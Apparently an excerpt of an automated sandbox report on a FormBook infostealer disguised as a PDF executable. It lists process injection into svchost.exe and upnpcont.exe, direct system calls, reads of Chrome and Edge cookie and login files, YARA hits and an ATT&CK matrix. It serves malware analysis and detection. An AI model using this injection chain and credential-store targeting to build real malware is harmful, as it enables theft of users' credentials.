                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BCA11 mov eax, dword ptr fs:[00000030h]2_2_032BCA11
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DEA60 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03286AA4 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h] (9 occurrences)
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03304A80 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03268A90 mov edx, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h] (2 occurrences)
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h] (3 occurrences)
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03230AD0 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B892A mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C892B mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032BC912 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03228918 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0327096E mov edx, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032BC97C mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B0946 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03304940 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032309AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B89B3 mov esi, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032BE9E0 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C69C0 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032649D0 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032FA9D3 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03252835 mov ecx, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326A830 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D483A mov eax, dword ptr fs:[00000030h] (2 occurrences)
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032BC810 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0037A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_003681AC SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00368189 SetUnhandledExceptionFilter
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D08189 SetUnhandledExceptionFilter
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D081AC SetUnhandledExceptionFilter,UnhandledExceptionFilter

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtClose: Direct from: 0x76F02B6C
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtCreateKey: Direct from: 0x76F02C6C
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtSetInformationThread: Direct from: 0x76F02B4C
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtOpenSection: Direct from: 0x76F02E0C
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtCreateFile: Direct from: 0x76F02FEC
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtOpenFile: Direct from: 0x76F02DCC
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtSetInformationThread: Direct from: 0x76F02ECC
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtTerminateThread: Direct from: 0x76F02FCC
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtCreateMutant: Direct from: 0x76F035CC
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtResumeThread: Direct from: 0x76F036AC
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtReadFile: Direct from: 0x76F02ADC
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtDelayExecution: Direct from: 0x76F02DDC
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtResumeThread: Direct from: 0x76F02FBC
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | NtCreateUserProcess: Direct from: 0x76F0371C
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                    Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe protection: execute and read and write
                    Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\upnpcont.exe protection: execute and read and write
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: NULL target: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe protection: read write
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: NULL target: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe protection: execute and read and write
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Thread register set: target process: 8040
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Thread APC queued: target process: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 295A008
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2B33008
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0037B106 LogonUserW
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00343D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0038411C SendInput,keybd_event
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_003874BB mouse_event
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe"
                    Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\retrofit\cunila.exe "C:\Users\user\AppData\Local\retrofit\cunila.exe"
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\retrofit\cunila.exe"
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | Process created: C:\Windows\SysWOW64\upnpcont.exe "C:\Windows\SysWOW64\upnpcont.exe"
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0037A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_003871FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                    Source: 5674656777985-069688574654 pdf.exe, cunila.exe, XzXxPWzavnqD.exe, 00000009.00000000.2221563326.0000000001711000.00000002.00000001.00040000.00000000.sdmp, XzXxPWzavnqD.exe, 00000009.00000002.3083677425.0000000001711000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                    Source: XzXxPWzavnqD.exe, 00000009.00000000.2221563326.0000000001711000.00000002.00000001.00040000.00000000.sdmp, XzXxPWzavnqD.exe, 00000009.00000002.3083677425.0000000001711000.00000002.00000001.00040000.00000000.sdmp, XzXxPWzavnqD.exe, 0000000B.00000000.2399203433.0000000001630000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                    Source: 5674656777985-069688574654 pdf.exe, cunila.exe.0.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                    Source: XzXxPWzavnqD.exe, 00000009.00000000.2221563326.0000000001711000.00000002.00000001.00040000.00000000.sdmp, XzXxPWzavnqD.exe, 00000009.00000002.3083677425.0000000001711000.00000002.00000001.00040000.00000000.sdmp, XzXxPWzavnqD.exe, 0000000B.00000000.2399203433.0000000001630000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                    Source: XzXxPWzavnqD.exe, 00000009.00000000.2221563326.0000000001711000.00000002.00000001.00040000.00000000.sdmp, XzXxPWzavnqD.exe, 00000009.00000002.3083677425.0000000001711000.00000002.00000001.00040000.00000000.sdmp, XzXxPWzavnqD.exe, 0000000B.00000000.2399203433.0000000001630000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_003665C4 cpuid
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0039091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_003BB340 GetUserNameW
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00371E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0035DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000A.00000002.3082710229.0000000002250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000002.2341433295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.2332196683.0000000006140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.3082947555.0000000002700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.3082882435.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.3083758728.0000000002A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.2322322646.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.2321538525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.3084135785.0000000003730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: C:\Windows\SysWOW64\upnpcont.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Source: C:\Windows\SysWOW64\upnpcont.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\SysWOW64\upnpcont.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Windows\SysWOW64\upnpcont.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\SysWOW64\upnpcont.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\SysWOW64\upnpcont.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                    Source: C:\Windows\SysWOW64\upnpcont.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                    Source: C:\Windows\SysWOW64\upnpcont.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                    Source: cunila.exe | Binary or memory string: WIN_81
                    Source: cunila.exe | Binary or memory string: WIN_XP
                    Source: cunila.exe.0.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                    Source: cunila.exe | Binary or memory string: WIN_XPe
                    Source: cunila.exe | Binary or memory string: WIN_VISTA
                    Source: cunila.exe | Binary or memory string: WIN_7
                    Source: cunila.exe | Binary or memory string: WIN_8

                    Remote Access Functionality

                    Source: Yara match | File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000A.00000002.3082710229.0000000002250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000002.2341433295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.2332196683.0000000006140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.3082947555.0000000002700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.3082882435.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.3083758728.0000000002A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.2322322646.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.2321538525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.3084135785.0000000003730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00398C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0039923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D38C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_0039923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK matrix, listed per tactic column in the order the report renders it. Numbers in parentheses are the report's detection badges for that technique; entries without a number carry no detection.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Scripting (1 1 1); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Native API (3); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: Scripting (1 1 1); DLL Side-Loading (1); Valid Accounts (2); Registry Run Keys / Startup Folder (2); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (2 1); Process Injection (4 1 2); Registry Run Keys / Startup Folder (2); Scheduled Task/Job; At; Cron
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (2); DLL Side-Loading (1); Masquerading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (2 1); Process Injection (4 1 2)
Credential Access: OS Credential Dumping (1); Input Capture (2 1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (3); System Information Discovery (1 1 7); Security Software Discovery (2 5 1); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (1 1); System Owner/User Discovery (1); Network Service Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (2 1); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph (ID 1558148; sample 5674656777985-069688574654 pdf.exe; start date 19/11/2024; architecture WINDOWS; score 100)

Sample-level network contacts: www.vpnto.net; www.sitioseguro.blog; 5 other IPs or domains
Sample-level signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 5 other signatures

5674656777985-069688574654 pdf.exe (started)
